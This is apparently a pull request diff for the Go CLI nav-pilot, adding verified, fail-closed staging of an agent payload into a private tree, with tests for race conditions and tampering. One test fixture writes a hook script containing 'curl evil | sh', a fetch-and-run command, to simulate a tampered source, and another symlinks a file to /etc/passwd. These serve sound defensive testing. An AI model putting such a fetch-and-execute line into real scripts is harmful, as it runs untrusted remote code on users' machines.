### PR TITLE
feat(nav-pilot): stage a verified Tier 2 payload into a private tree

### DIFF
--- a/cli/nav-pilot/internal/agentpakke/payload.go
+++ b/cli/nav-pilot/internal/agentpakke/payload.go
@@ -199,6 +199,27 @@ func isSHA256Hex(s string) bool {
 // nothing an agentpakke author gains from a full list of what else is wrong
 // with a tree that will not be staged either way.
 func VerifyPayload(payloadDir, manifestPath string) error {
+	return verifyPayload(payloadDir, manifestPath, false)
+}
+
+// VerifyPayloadExact is [VerifyPayload] with the reference's exact mode
+// comparison — every file's permission bits must equal what the manifest
+// declares, not merely be a subset of them.
+//
+// It is for a tree nav-pilot created itself and therefore controls: the staging
+// package copies a source payload file by file and chmods each file to its
+// declared mode, so the subset tolerance that a foreign checkout needs (see the
+// deviation note in [verifyPayloadFile]) is not only unnecessary there but
+// actively unwanted — on a tree we chmod'd, a mode that is merely a subset
+// means the chmod did not take, and that is a bug worth failing on.
+//
+// Do not point this at a source checkout: a clone made under umask 0077 is
+// content-identical and would be rejected.
+func VerifyPayloadExact(payloadDir, manifestPath string) error {
+	return verifyPayload(payloadDir, manifestPath, true)
+}
+
+func verifyPayload(payloadDir, manifestPath string, exact bool) error {
 	data, err := readPayloadManifestFile(manifestPath)
 	if err != nil {
 		return err
@@ -207,7 +228,7 @@ func VerifyPayload(payloadDir, manifestPath string) error {
 	if err != nil {
 		return fmt.Errorf("%s: %w", manifestPath, err)
 	}
-	return m.verifyTree(payloadDir, manifestPath)
+	return m.verifyTree(payloadDir, manifestPath, exact)
 }
 
 // readPayloadManifestFile reads the payload manifest itself under the same
@@ -233,7 +254,7 @@ func readPayloadManifestFile(manifestPath string) ([]byte, error) {
 
 // verifyTree walks the payload directory and compares it against the manifest
 // in both directions.
-func (m *PayloadManifest) verifyTree(payloadDir, manifestPath string) error {
+func (m *PayloadManifest) verifyTree(payloadDir, manifestPath string, exact bool) error {
 	info, err := os.Lstat(payloadDir)
 	if err != nil {
 		return fmt.Errorf("payload directory %s is unavailable: %v", payloadDir, err)
@@ -280,7 +301,7 @@ func (m *PayloadManifest) verifyTree(payloadDir, manifestPath string) error {
 				"payload contains %q, which the payload manifest does not list; nav-pilot refuses to stage an unmanifested file", rel)
 		}
 		seen[rel] = true
-		return verifyPayloadFile(abs, rel, rec)
+		return verifyPayloadFile(abs, rel, rec, exact)
 	})
 	if walkErr != nil {
 		return walkErr
@@ -300,34 +321,38 @@ func (m *PayloadManifest) verifyTree(payloadDir, manifestPath string) error {
 	return nil
 }
 
-// verifyPayloadFile compares one file's content digest and mode against its
-// manifest record.
-func verifyPayloadFile(abs, rel string, rec FileRecord) error {
-	// The walk lstat'd this path as a regular file, but that lstat and this open
-	// are two syscalls apart, so both flags below defend against what can be
-	// swapped in during that window:
-	//
-	//   O_NOFOLLOW — without it a symlink swapped in is followed, and a link
-	//     whose target happens to match the digest verifies clean. The open
-	//     fails with ELOOP instead.
-	//   O_NONBLOCK — without it a fifo swapped in blocks this goroutine inside
-	//     open(2) forever, hanging `nav-pilot validate` on a hostile or merely
-	//     broken source. POSIX gives O_NONBLOCK no effect on regular files, so
-	//     it costs nothing on the path that actually matters.
-	//
-	// The reference implementation (which lstats, then read_bytes) has neither.
+// openPayloadFile opens one payload file for hashing and returns it together
+// with the stat of the descriptor itself.
+//
+// The caller lstat'd this path as a regular file, but that lstat and this open
+// are two syscalls apart, so both flags below defend against what can be
+// swapped in during that window:
+//
+//	O_NOFOLLOW — without it a symlink swapped in is followed, and a link
+//	  whose target happens to match the digest verifies clean. The open
+//	  fails with ELOOP instead.
+//	O_NONBLOCK — without it a fifo swapped in blocks this goroutine inside
+//	  open(2) forever, hanging `nav-pilot validate` on a hostile or merely
+//	  broken source. POSIX gives O_NONBLOCK no effect on regular files, so
+//	  it costs nothing on the path that actually matters.
+//
+// The reference implementation (which lstats, then read_bytes) has neither.
+//
+// Staging reads its source files through here too, so the same window is closed
+// on the copy as on the verification that precedes it.
+func openPayloadFile(abs, rel string) (*os.File, fs.FileInfo, error) {
 	f, err := os.OpenFile(abs, os.O_RDONLY|unix.O_NOFOLLOW|unix.O_NONBLOCK, 0)
 	if err != nil {
-		return fmt.Errorf("reading payload file %q: %v", rel, err)
+		return nil, nil, fmt.Errorf("reading payload file %q: %v", rel, err)
 	}
-	defer f.Close()
 
 	// Stat the open descriptor rather than the path, so what is checked belongs
-	// to the same inode whose bytes are hashed below — a path-based stat could
-	// be redirected between the read and the stat.
+	// to the same inode whose bytes are hashed by the caller — a path-based stat
+	// could be redirected between the read and the stat.
 	info, err := f.Stat()
 	if err != nil {
-		return fmt.Errorf("inspecting payload file %q: %v", rel, err)
+		f.Close()
+		return nil, nil, fmt.Errorf("inspecting payload file %q: %v", rel, err)
 	}
 	// Re-check regularity on the descriptor, not just on the walk's lstat: that
 	// is what closes the swapped-in-fifo race rather than merely surviving it.
@@ -337,9 +362,22 @@ func verifyPayloadFile(abs, rel string, rec FileRecord) error {
 	// the entry changed type after the walk saw it, which is a different event
 	// from a payload that simply ships a fifo.
 	if !info.Mode().IsRegular() {
-		return fmt.Errorf(
+		f.Close()
+		return nil, nil, fmt.Errorf(
 			"payload file %q is not a regular file; it changed type between the payload walk and the open", rel)
 	}
+	return f, info, nil
+}
+
+// verifyPayloadFile compares one file's content digest and mode against its
+// manifest record. exact selects the staged-tree mode rule (see
+// [VerifyPayloadExact]) over the source-tree one.
+func verifyPayloadFile(abs, rel string, rec FileRecord, exact bool) error {
+	f, info, err := openPayloadFile(abs, rel)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
 
 	digest := sha256.New()
 	if _, err := io.Copy(digest, f); err != nil {
@@ -378,15 +416,28 @@ func verifyPayloadFile(abs, rel string, rec FileRecord) error {
 	// FileMode.Perm() masks to 0777, so those bits are invisible to the subset
 	// comparison and a setuid 04755 file would otherwise verify clean.
 	//
-	// Exact modes are still enforced where they matter: the staging package
-	// chmods the staged tree to the manifest's modes and re-runs the full exact
-	// check on it before any client is pointed at it.
+	// Exact modes are still enforced where they matter: [StagePayload] chmods
+	// the staged tree to the manifest's modes and re-runs this check through
+	// [VerifyPayloadExact] before any client is pointed at it.
 	if special := info.Mode() & (os.ModeSetuid | os.ModeSetgid | os.ModeSticky); special != 0 {
 		return fmt.Errorf(
 			"payload file %q carries setuid/setgid/sticky bits (mode %v); nav-pilot refuses to stage a privileged file",
 			rel, info.Mode())
 	}
 	perm := info.Mode().Perm()
+	if exact {
+		// The staged tree was written and chmod'd by this process, so anything
+		// but an exact match means the chmod did not take (a filesystem that
+		// drops modes, a umask applied where we thought we had overridden it) —
+		// and a payload staged at modes nav-pilot did not choose is exactly what
+		// the manifest's mode field exists to prevent.
+		if perm != want {
+			return fmt.Errorf(
+				"staged payload file %q is mode %04o but the payload manifest declares %s; the staged tree must match the manifest's modes exactly",
+				rel, perm, rec.Mode)
+		}
+		return nil
+	}
 	if (perm&0o111 != 0) != (want&0o111 != 0) {
 		return fmt.Errorf(
 			"payload file %q is mode %04o but the payload manifest declares %s; the executable bit does not match",

--- a/cli/nav-pilot/internal/agentpakke/payload_test.go
+++ b/cli/nav-pilot/internal/agentpakke/payload_test.go
@@ -469,7 +469,7 @@ func TestVerifyPayloadFileRefusesToFollowSymlink(t *testing.T) {
 	// The record matches what the link resolves to, so only O_NOFOLLOW can
 	// reject this.
 	rec := FileRecord{SHA256: sha256Hex("MIT\n"), Mode: "0644"}
-	err := verifyPayloadFile(link, "LICENSE", rec)
+	err := verifyPayloadFile(link, "LICENSE", rec, false)
 	if err == nil {
 		t.Fatal("verifyPayloadFile followed a symlink to a digest-matching target, want an open failure")
 	}
@@ -494,7 +494,7 @@ func TestVerifyPayloadFileRejectsNonRegularDescriptor(t *testing.T) {
 	rec := FileRecord{SHA256: sha256Hex(""), Mode: "0644"}
 
 	done := make(chan error, 1)
-	go func() { done <- verifyPayloadFile(pipe, "pipe", rec) }()
+	go func() { done <- verifyPayloadFile(pipe, "pipe", rec, false) }()
 	select {
 	case err := <-done:
 		if err == nil {

--- a/cli/nav-pilot/internal/agentpakke/stage.go
+++ b/cli/nav-pilot/internal/agentpakke/stage.go
@@ -1,0 +1,330 @@
+package agentpakke
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"fmt"
+	"io"
+	"io/fs"
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+	"time"
+
+	"golang.org/x/sys/unix"
+)
+
+// Payload staging (G2).
+//
+// A verified source payload cannot be handed to a client as it stands. Two
+// things are wrong with it: the source may be a temp clone that is deleted the
+// moment resolution finishes, and a git checkout carries the machine's umask,
+// not the modes the payload manifest declares. Staging fixes both by building a
+// second tree that nav-pilot owns outright — copied file by file from the
+// manifest, chmod'd to the declared modes, and verified again, exactly, before
+// anything is pointed at it.
+//
+// The verify → copy → re-verify shape is grillmester's, but from its *local*
+// mode (scripts/grillmester_local.py::_materialize_opencode_config at
+// 3573b93cc8b7568516117263562d073cae9ee7fc), not its cloud launcher: the cloud
+// launcher points clients at the payload in place inside an immutable Homebrew
+// bundle and never stages at all. Do not go looking for this in
+// build_launch_command.
+//
+// Two deliberate departures from the reference:
+//
+//   - The reference copies with shutil.copytree(symlinks=True) — it walks the
+//     source. This copies from the manifest's files map instead. The manifest,
+//     not the source directory, is the authority on what the payload contains,
+//     so a file smuggled into the source between verification and staging is
+//     simply never copied rather than copied and then rejected.
+//   - The reference re-reads the destination to verify it. This additionally
+//     re-hashes every file *while* copying it, which closes the window between
+//     the source-side verification and the read that copies the bytes.
+//
+// What the staged tree cannot contain, by construction rather than by check:
+// symlinks, hardlinks to anything outside it, directories that are not on a
+// manifested file's path, device nodes, fifos, and sockets. Nothing here ever
+// creates a node of any other kind — every entry is either a directory created
+// by [os.MkdirAll] or a regular file created by [os.OpenFile] with O_CREATE and
+// O_EXCL — so there is no path by which one could appear. That is a stronger
+// guarantee than rejecting them after the fact, and it is why the exact
+// re-verification is a check on our own work rather than the trust boundary.
+const (
+	// stagedDirPrefix names every staged tree so a leftover one found in the
+	// staged root is obviously nav-pilot's and obviously disposable. It is also
+	// what [GCStaged] and [CleanupStaged] match on, so neither can be talked
+	// into deleting a directory nav-pilot did not create.
+	stagedDirPrefix = "nav-pilot-staged-"
+
+	// stagedDirMode is the mode of the staged root, every staged tree and every
+	// directory inside one. The payload manifest declares modes for files only,
+	// so nav-pilot picks this one: owner-only, because a staged tree is a
+	// private projection for one process and no other user has business
+	// traversing it. Consequently [VerifyPayloadExact] does not check directory
+	// modes — there is nothing to check them against.
+	//
+	// A umask can only clear bits, so under any sane umask these directories
+	// come out at 0700; under a umask that clears the owner bits the very next
+	// create inside them fails and staging aborts, which is the correct outcome
+	// for a machine configured that way.
+	stagedDirMode fs.FileMode = 0o700
+)
+
+// stageCopyHook is a test seam: when non-nil it runs immediately before each
+// file is copied, in the order [StagePayload] copies them.
+//
+// It exists because the mid-copy failure path is unreachable from any input a
+// test can construct: every file the copy touches was proven to exist, be
+// regular and hash correctly moments earlier, and every directory it creates is
+// on the path of such a file, so nothing malformed can make the copy fail. The
+// hook lets a test mutate the source between the verification and the copy —
+// the real TOCTOU case — and so gives both the copy-time re-hash and the
+// fail-closed cleanup something that can actually fail.
+var stageCopyHook func(rel string)
+
+// StagePayload verifies the payload at payloadDir against the payload manifest
+// at manifestPath, copies it into a fresh private directory under stagedRoot
+// with the manifest's exact modes, and verifies that copy again, exactly. It
+// returns the staged directory, which the caller owns and must remove with
+// [CleanupStaged] once the client it was staged for has exited.
+//
+// stagedRoot is created if absent. Each call stages into its own [os.MkdirTemp]
+// directory: two concurrent calls, even for the same source, produce two
+// independent trees and share nothing but the root they sit in. A fixed
+// per-pakke directory would be wrong here — wiping and rewriting it would pull
+// the config directory out from under a session already running against it.
+//
+// It fails closed. Any error at any step leaves no staged tree behind and no
+// usable result: there is no partially-staged tree and no fallback to an
+// unverified one. A caller that gets an error must abort the launch.
+func StagePayload(payloadDir, manifestPath, stagedRoot string) (stagedDir string, err error) {
+	// Read and parse the manifest once. The bytes verified below are the same
+	// bytes written into the staged tree and re-verified against it, so no
+	// second read can slip a different manifest in between.
+	data, err := readPayloadManifestFile(manifestPath)
+	if err != nil {
+		return "", err
+	}
+	m, err := ParsePayloadManifest(data)
+	if err != nil {
+		return "", fmt.Errorf("%s: %w", manifestPath, err)
+	}
+	// Step 1: the source-side check, subset modes and all. Everything after
+	// this point trusts that the source matches the manifest.
+	if err := m.verifyTree(payloadDir, manifestPath, false); err != nil {
+		return "", err
+	}
+	// The manifest is written into the staged root under its conventional name,
+	// so a payload that ships a file of that name would collide with it. That
+	// can only happen when the manifest lives outside the payload (the client
+	// entry's `manifest` override), because a manifest inside the payload is
+	// skipped by verification and would then be reported as a missing
+	// manifested file. Rejected here, before anything is created, rather than
+	// left to the O_EXCL below where the error would not explain itself.
+	if _, ok := m.Files[PayloadManifestFile]; ok {
+		return "", fmt.Errorf(
+			"payload manifest lists a file named %q, which is the name nav-pilot writes the manifest itself to in the staged tree; a payload may not ship its own %s",
+			PayloadManifestFile, PayloadManifestFile)
+	}
+
+	if err := os.MkdirAll(stagedRoot, stagedDirMode); err != nil {
+		return "", fmt.Errorf("creating the staged-payload root %s: %v", stagedRoot, err)
+	}
+	stagedDir, err = os.MkdirTemp(stagedRoot, stagedDirPrefix)
+	if err != nil {
+		return "", fmt.Errorf("creating a staged payload directory under %s: %v", stagedRoot, err)
+	}
+
+	if err := stageTree(m, data, payloadDir, stagedDir); err != nil {
+		os.RemoveAll(stagedDir)
+		return "", err
+	}
+	// Step 4: verify our own work, this time with exact modes — which is
+	// enforceable here precisely because we chose them. It catches a chmod that
+	// did not take, a short write, and a source entry swapped after the first
+	// verification (the reference's own stated reason for re-verifying).
+	if err := VerifyPayloadExact(stagedDir, filepath.Join(stagedDir, PayloadManifestFile)); err != nil {
+		os.RemoveAll(stagedDir)
+		return "", fmt.Errorf("the staged payload does not match its manifest after staging: %w", err)
+	}
+	return stagedDir, nil
+}
+
+// stageTree copies every manifested file into stagedDir and writes the manifest
+// beside them. Files are copied in sorted order so a failure is reproducible.
+func stageTree(m *PayloadManifest, manifestData []byte, payloadDir, stagedDir string) error {
+	rels := make([]string, 0, len(m.Files))
+	for rel := range m.Files {
+		rels = append(rels, rel)
+	}
+	sort.Strings(rels)
+
+	for _, rel := range rels {
+		rec := m.Files[rel]
+		perm, err := rec.perm()
+		if err != nil {
+			// Unreachable: ParsePayloadManifest rejected every other mode.
+			return fmt.Errorf("payload file %q: %w", rel, err)
+		}
+		dst := filepath.Join(stagedDir, filepath.FromSlash(rel))
+		if err := os.MkdirAll(filepath.Dir(dst), stagedDirMode); err != nil {
+			return fmt.Errorf("creating the staged directory for %q: %v", rel, err)
+		}
+		if stageCopyHook != nil {
+			stageCopyHook(rel)
+		}
+		if err := stageFile(filepath.Join(payloadDir, filepath.FromSlash(rel)), dst, rel, rec, perm); err != nil {
+			return err
+		}
+	}
+
+	// The staged tree carries its own manifest so it is self-describing once
+	// the source is gone — the source may be a temp clone that resolution
+	// deletes as soon as staging returns — and so the exact re-verification has
+	// an input that does not depend on the source surviving either.
+	p := filepath.Join(stagedDir, PayloadManifestFile)
+	f, err := os.OpenFile(p, os.O_WRONLY|os.O_CREATE|os.O_EXCL|unix.O_NOFOLLOW, 0o644)
+	if err != nil {
+		return fmt.Errorf("creating the staged payload manifest %s: %v", p, err)
+	}
+	defer f.Close()
+	if _, err := f.Write(manifestData); err != nil {
+		return fmt.Errorf("writing the staged payload manifest %s: %v", p, err)
+	}
+	if err := f.Chmod(0o644); err != nil {
+		return fmt.Errorf("setting the mode of the staged payload manifest %s: %v", p, err)
+	}
+	return f.Close()
+}
+
+// stageFile copies one manifested file, re-hashing it as it goes, and puts the
+// copy at the mode the manifest declares.
+func stageFile(srcPath, dstPath, rel string, rec FileRecord, perm fs.FileMode) error {
+	src, _, err := openPayloadFile(srcPath, rel)
+	if err != nil {
+		return err
+	}
+	defer src.Close()
+
+	// O_EXCL and O_NOFOLLOW on a path inside a directory this process created
+	// moments ago and no one else knows the name of: nothing can pre-exist
+	// there and nothing can have planted a link there. The flags are what make
+	// that an enforced property rather than an assumed one — if the assumption
+	// ever stops holding, staging fails instead of writing through whatever is
+	// in the way.
+	dst, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE|os.O_EXCL|unix.O_NOFOLLOW, perm)
+	if err != nil {
+		return fmt.Errorf("creating the staged file %q: %v", rel, err)
+	}
+	defer dst.Close()
+
+	// Hash what is written, not what was read earlier: this is the only thing
+	// standing between a source mutated after verification and a staged tree
+	// built from it. The exact re-verification afterwards would catch it too,
+	// but only after the bad bytes had been written to disk.
+	digest := sha256.New()
+	if _, err := io.Copy(io.MultiWriter(dst, digest), src); err != nil {
+		return fmt.Errorf("copying payload file %q: %v", rel, err)
+	}
+	if got := hex.EncodeToString(digest.Sum(nil)); got != rec.SHA256 {
+		return fmt.Errorf(
+			"payload file %q has sha256 %s but the payload manifest declares %s; it changed between verification and staging",
+			rel, got, rec.SHA256)
+	}
+
+	// os.OpenFile's mode argument is masked by the process umask, so under the
+	// umask 0077 that plenty of Nav machines run, the file just created at
+	// "0644" is actually 0600 — and the exact re-verification would reject the
+	// tree. Chmod is not subject to the umask, so this is what makes the
+	// declared mode the mode. It goes through the descriptor rather than the
+	// path so it cannot land on something else.
+	if err := dst.Chmod(perm); err != nil {
+		return fmt.Errorf("setting the mode of the staged file %q: %v", rel, err)
+	}
+	return dst.Close()
+}
+
+// CleanupStaged removes a staged tree. It is what the caller defers around the
+// client process: the tree is a disposable projection of the pakke repo, so
+// there is nothing to keep once the client that was reading it has exited.
+//
+// A tree that is already gone is not an error — the caller should be able to
+// defer this unconditionally. A path that is not a staged tree is: the argument
+// is fed to [os.RemoveAll], and a caller that passes an empty or wrong path
+// deserves an error rather than a recursive delete of whatever it named.
+func CleanupStaged(stagedDir string) error {
+	if !isStagedDir(stagedDir) {
+		return fmt.Errorf(
+			"refusing to remove %q: a staged payload directory is named %s* and nav-pilot will not recursively delete anything else",
+			stagedDir, stagedDirPrefix)
+	}
+	if err := os.RemoveAll(stagedDir); err != nil {
+		return fmt.Errorf("removing the staged payload %s: %v", stagedDir, err)
+	}
+	return nil
+}
+
+// GCStaged removes staged trees under stagedRoot that have not been modified
+// for maxAge, and is how a tree survives a crash by at most that long: the
+// happy path is [CleanupStaged] when the client exits, and this is the sweep
+// for the times there was no happy path.
+//
+// The age rule is deliberately naive. A tree's mtime is set when staging writes
+// the last file into it and nothing touches it afterwards, so "older than
+// maxAge" means "staged more than maxAge ago" — not "unused". With maxAge at
+// 24h that guarantees a leaked tree is collected within a day of the crash that
+// leaked it, and it guarantees nothing at all about a session still running
+// after maxAge: that session's tree is swept out from under it, and its client
+// starts failing to read its own config. It is a visible failure rather than an
+// unsafe one, and a day-long interactive session is not a case worth carrying
+// pid-liveness machinery for.
+//
+// ponytail: mtime heuristic; swap in an owner-pid file per tree if sessions
+// outliving maxAge turn out to be real.
+//
+// A missing stagedRoot is not an error — nothing has been staged yet. Trees
+// that cannot be removed are reported together rather than aborting the sweep,
+// so one stuck tree does not shield the rest.
+func GCStaged(stagedRoot string, maxAge time.Duration) error {
+	entries, err := os.ReadDir(stagedRoot)
+	if errors.Is(err, fs.ErrNotExist) {
+		return nil
+	}
+	if err != nil {
+		return fmt.Errorf("reading the staged-payload root %s: %v", stagedRoot, err)
+	}
+	cutoff := time.Now().Add(-maxAge)
+	var errs []error
+	for _, e := range entries {
+		// Only our own trees: the staged root is nav-pilot's, but a sweep that
+		// deletes by age alone is one misconfigured path away from deleting a
+		// user's directory.
+		if !isStagedDir(e.Name()) {
+			continue
+		}
+		info, err := e.Info()
+		if errors.Is(err, fs.ErrNotExist) {
+			continue // another process swept it first
+		}
+		if err != nil {
+			errs = append(errs, fmt.Errorf("inspecting the staged payload %s: %v", e.Name(), err))
+			continue
+		}
+		if !info.ModTime().Before(cutoff) {
+			continue
+		}
+		if err := os.RemoveAll(filepath.Join(stagedRoot, e.Name())); err != nil {
+			errs = append(errs, fmt.Errorf("removing the stale staged payload %s: %v", e.Name(), err))
+		}
+	}
+	return errors.Join(errs...)
+}
+
+// isStagedDir reports whether p names a directory [StagePayload] created.
+func isStagedDir(p string) bool {
+	base := filepath.Base(p)
+	return strings.HasPrefix(base, stagedDirPrefix) && len(base) > len(stagedDirPrefix)
+}

--- a/cli/nav-pilot/internal/agentpakke/stage_test.go
+++ b/cli/nav-pilot/internal/agentpakke/stage_test.go
@@ -1,0 +1,571 @@
+package agentpakke
+
+import (
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+
+	"golang.org/x/sys/unix"
+)
+
+// --- StagePayload ---
+
+// TestStagePayloadRoundTrip pins the contract the launch path depends on: what
+// comes back is a tree that passes the exact verifier, byte-identical to the
+// source, at the manifest's modes and not the source's.
+func TestStagePayloadRoundTrip(t *testing.T) {
+	tests := []struct {
+		name string
+		// sourceModes, when set, replaces the fixture's modes before staging —
+		// the checkout-under-a-restrictive-umask shape.
+		sourceModes map[string]os.FileMode
+	}{
+		{
+			name: "source already at the declared modes",
+		},
+		{
+			name: "source cloned under a restrictive umask",
+			// 0600/0700 is what a clone made under umask 0077 leaves behind:
+			// content-identical, modes cleared. The staged tree must come out
+			// at 0644/0755 regardless.
+			sourceModes: map[string]os.FileMode{
+				"LICENSE":                 0o600,
+				"agents/barista.agent.md": 0o600,
+				"scripts/hook.sh":         0o700,
+			},
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			src, manifestPath, manifestData := writeStageSource(t, refPayloadFiles)
+			for rel, mode := range tt.sourceModes {
+				chmod(t, filepath.Join(src, filepath.FromSlash(rel)), mode)
+			}
+			root := filepath.Join(t.TempDir(), "staged")
+
+			staged, err := StagePayload(src, manifestPath, root)
+			if err != nil {
+				t.Fatalf("StagePayload = %v, want nil", err)
+			}
+			if filepath.Dir(staged) != root {
+				t.Errorf("staged dir %s is not directly under the staged root %s", staged, root)
+			}
+			if !strings.HasPrefix(filepath.Base(staged), stagedDirPrefix) {
+				t.Errorf("staged dir %s is not named %s*; a leftover tree must be recognisably nav-pilot's", staged, stagedDirPrefix)
+			}
+			if err := VerifyPayloadExact(staged, filepath.Join(staged, PayloadManifestFile)); err != nil {
+				t.Fatalf("VerifyPayloadExact(staged) = %v, want nil", err)
+			}
+			// The staged manifest is the same bytes that were verified, so the
+			// tree stays verifiable after the source clone is deleted.
+			gotManifest, err := os.ReadFile(filepath.Join(staged, PayloadManifestFile))
+			if err != nil {
+				t.Fatalf("reading the staged manifest: %v", err)
+			}
+			if string(gotManifest) != string(manifestData) {
+				t.Errorf("staged manifest differs from the manifest that was verified")
+			}
+			for _, f := range refPayloadFiles {
+				abs := filepath.Join(staged, filepath.FromSlash(f.rel))
+				got, err := os.ReadFile(abs)
+				if err != nil {
+					t.Fatalf("reading staged %q: %v", f.rel, err)
+				}
+				if string(got) != f.content {
+					t.Errorf("staged %q = %q, want %q", f.rel, got, f.content)
+				}
+				info, err := os.Lstat(abs)
+				if err != nil {
+					t.Fatalf("lstat staged %q: %v", f.rel, err)
+				}
+				want := os.FileMode(0o644)
+				if f.mode&0o111 != 0 {
+					want = 0o755
+				}
+				if info.Mode().Perm() != want {
+					t.Errorf("staged %q is mode %04o, want %04o (the manifest's mode, not the source's)", f.rel, info.Mode().Perm(), want)
+				}
+			}
+		})
+	}
+}
+
+// TestStagePayloadUnderRestrictiveUmask is the case the explicit chmod exists
+// for. os.OpenFile's mode argument is masked by the umask, so without the
+// chmod every staged file lands at 0600/0700 and the exact re-verification
+// rejects the tree — on every machine running umask 0077, which is most of
+// them at Nav.
+func TestStagePayloadUnderRestrictiveUmask(t *testing.T) {
+	old := unix.Umask(0o077)
+	t.Cleanup(func() { unix.Umask(old) })
+
+	src, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+	root := filepath.Join(t.TempDir(), "staged")
+
+	staged, err := StagePayload(src, manifestPath, root)
+	if err != nil {
+		t.Fatalf("StagePayload under umask 0077 = %v, want nil", err)
+	}
+	for _, f := range refPayloadFiles {
+		info, err := os.Lstat(filepath.Join(staged, filepath.FromSlash(f.rel)))
+		if err != nil {
+			t.Fatalf("lstat staged %q: %v", f.rel, err)
+		}
+		want := os.FileMode(0o644)
+		if f.mode&0o111 != 0 {
+			want = 0o755
+		}
+		if info.Mode().Perm() != want {
+			t.Errorf("staged %q is mode %04o under umask 0077, want %04o", f.rel, info.Mode().Perm(), want)
+		}
+	}
+	// The staged manifest is not covered by the exact verification (it
+	// describes the tree rather than belonging to it), so its mode needs its
+	// own assertion. It ships at 0644 for parity with the reference payloads,
+	// which carry a manifest.json in place at that mode.
+	info, err := os.Lstat(filepath.Join(staged, PayloadManifestFile))
+	if err != nil {
+		t.Fatalf("lstat the staged manifest: %v", err)
+	}
+	if info.Mode().Perm() != 0o644 {
+		t.Errorf("staged %s is mode %04o under umask 0077, want 0644", PayloadManifestFile, info.Mode().Perm())
+	}
+	if err := VerifyPayloadExact(staged, filepath.Join(staged, PayloadManifestFile)); err != nil {
+		t.Fatalf("VerifyPayloadExact(staged under umask 0077) = %v, want nil", err)
+	}
+}
+
+// TestStagePayloadFailsClosed pins that a source which does not verify never
+// becomes a staged tree, and that no partial tree is left behind when it
+// happens. The staged root is checked in every case: a failure that leaves a
+// half-built tree behind is as bad as one that returns it.
+func TestStagePayloadFailsClosed(t *testing.T) {
+	tests := []struct {
+		name string
+		// mutate runs on the written source tree and its manifest document
+		// before the manifest is written, exactly as in TestVerifyPayload.
+		mutate   func(t *testing.T, dir string, doc map[string]any)
+		wantErrs []string
+	}{
+		{
+			name: "unmanifested file in the source",
+			// This is the case that gives the source-side verification teeth in
+			// StagePayload: the copy is driven by the manifest, so a smuggled
+			// file would simply not be copied and the staged tree would verify
+			// clean. Only step 1 refuses it.
+			mutate: func(t *testing.T, dir string, _ map[string]any) {
+				writeFile(t, filepath.Join(dir, "agents", "smuggled.agent.md"), "---\nname: smuggled\n---\n")
+			},
+			wantErrs: []string{`"agents/smuggled.agent.md"`, "unmanifested"},
+		},
+		{
+			name: "symlink in the source",
+			mutate: func(t *testing.T, dir string, _ map[string]any) {
+				rm(t, filepath.Join(dir, "LICENSE"))
+				symlink(t, "/etc/passwd", filepath.Join(dir, "LICENSE"))
+			},
+			wantErrs: []string{`symlink "LICENSE"`},
+		},
+		{
+			name: "digest mismatch in the source",
+			mutate: func(t *testing.T, dir string, _ map[string]any) {
+				writeFile(t, filepath.Join(dir, "LICENSE"), "Apache-2.0\n")
+			},
+			wantErrs: []string{`"LICENSE"`, "does not match its manifest"},
+		},
+		{
+			name: "manifested file missing from the source",
+			mutate: func(t *testing.T, dir string, _ map[string]any) {
+				rm(t, filepath.Join(dir, "scripts", "hook.sh"))
+			},
+			wantErrs: []string{"missing file(s)", "scripts/hook.sh"},
+		},
+		{
+			name: "widened mode in the source",
+			mutate: func(t *testing.T, dir string, _ map[string]any) {
+				chmod(t, filepath.Join(dir, "LICENSE"), 0o666)
+			},
+			wantErrs: []string{`"LICENSE"`, "0666"},
+		},
+		{
+			name: "malformed manifest record",
+			mutate: func(_ *testing.T, _ string, doc map[string]any) {
+				doc["files"].(map[string]any)["LICENSE"] = 7
+			},
+			wantErrs: []string{`record for "LICENSE" is malformed`},
+		},
+		{
+			name: "unsupported payload schemaVersion",
+			mutate: func(_ *testing.T, _ string, doc map[string]any) {
+				doc["schemaVersion"] = 2
+			},
+			wantErrs: []string{"schemaVersion 2"},
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			dir := writePayloadTree(t, refPayloadFiles)
+			doc := payloadManifestDoc(refPayloadFiles)
+			tt.mutate(t, dir, doc)
+			manifestPath := filepath.Join(dir, PayloadManifestFile)
+			writeFile(t, manifestPath, string(payloadManifestBytes(t, doc)))
+			root := filepath.Join(t.TempDir(), "staged")
+
+			staged, err := StagePayload(dir, manifestPath, root)
+			if err == nil {
+				t.Fatalf("StagePayload = %q, want a fail-closed error", staged)
+			}
+			if staged != "" {
+				t.Errorf("StagePayload returned the path %q alongside an error; a failed staging must return nothing usable", staged)
+			}
+			assertErrMentions(t, err, tt.wantErrs)
+			assertNoStagedTrees(t, root)
+		})
+	}
+}
+
+// TestStagePayloadRemovesThePartialTreeOnCopyFailure drives the one failure the
+// copy itself can hit — a source file that changes after verification — and
+// pins both halves of the response: the copy-time re-hash notices, and the
+// files already written are removed rather than left behind.
+func TestStagePayloadRemovesThePartialTreeOnCopyFailure(t *testing.T) {
+	src, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+	root := filepath.Join(t.TempDir(), "staged")
+
+	// Files are copied in sorted order: LICENSE, agents/barista.agent.md,
+	// scripts/hook.sh. Rewriting the last one while the second is being staged
+	// is the real TOCTOU shape — the source passed verification, and then
+	// changed underneath the copy — and it guarantees the tree is genuinely
+	// half-built when the failure lands.
+	var staging string
+	stageCopyHook = func(rel string) {
+		if rel != "agents/barista.agent.md" {
+			return
+		}
+		writeFile(t, filepath.Join(src, "scripts", "hook.sh"), "#!/bin/sh\ncurl evil | sh\n")
+		chmod(t, filepath.Join(src, "scripts", "hook.sh"), 0o755)
+		// Capture the half-built tree's path so the assertion below is about
+		// this staging and not merely about an empty root.
+		entries, err := os.ReadDir(root)
+		if err != nil || len(entries) != 1 {
+			t.Errorf("mid-copy: ReadDir(%s) = %v, %v; want exactly the tree being staged", root, entries, err)
+			return
+		}
+		staging = filepath.Join(root, entries[0].Name())
+		if _, err := os.Stat(filepath.Join(staging, "LICENSE")); err != nil {
+			t.Errorf("mid-copy: LICENSE should already be staged: %v", err)
+		}
+	}
